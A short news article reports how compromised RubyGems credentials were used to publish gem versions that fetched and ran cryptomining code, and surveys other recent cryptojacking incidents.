Getting your Trinity Audio player ready... |
Cryptojacking malware has continued to evolve and in the latest case, it was planted on code libraries for the programming language Ruby. The malicious code, which was discovered by a security researcher on August 19, was published using the credentials of a rest-client maintainer whose RubyGems.org account was compromised.
RubyGems is a package manager that allows developers to upload and share improvements on existing pieces of software. The RubyGems security team quickly removed the code, but not before it exposed over 3,500 people, reported Decrypt.
The hackers first downloaded the software, infected it with the code and then uploaded it to RubyGems under new names. They targeted 11 of the most popular libraries. The infected libraries were downloaded over 3,500 times before the RubyGems team pulled down the offending gem version.
Five of the eleven were specific to crypto such as doge_coin, coin_base and blockchain_wallet, the latter two being the most popular downloads. According to the report, the infected version of coin_base was downloaded 424 times while blockchain_wallet was downloaded 423 times.
Once a user downloaded the infected libraries, it would trigger the downloading of malicious code from a URL in Pastebin.com and then execute it. Reportedly, the URL would execute instructions from yet another website; mironanoru.zzz.com.ua. The Pastebin URL and the website have since then disappeared.
The RubyGems team believes that the effect of the infection wasn’t as widespread as the targeted series was old and suspended in 2014. Further, the team released a new version of the targeted series so that those who preferred to continue using it still are protected. It also promised to establish better security practices to prevent the recurrence of the threat, such as enabling two-factor authentication on RubyGems.org accounts.
Cryptojacking attacks have continued to be a nightmare for cyber security experts across the world. Earlier this year, the most popular cryptojacking tool Coinhive was shut down which many thought would reduce the cases of cryptojacking. Coinhive was believed to account for two-thirds of the cryptojacking market at the time. However, the hackers have turned to other tools to continue with their trade.
Earlier this month, Smominru cryptojacking malware was reported to have been updated and was believed to be stealing data from 500,000 infected machines. In March, Guardicore Labs reported that a new cryptojacking malware had infected over 50,000 servers. The malware was said to be infecting 700 new victims every day.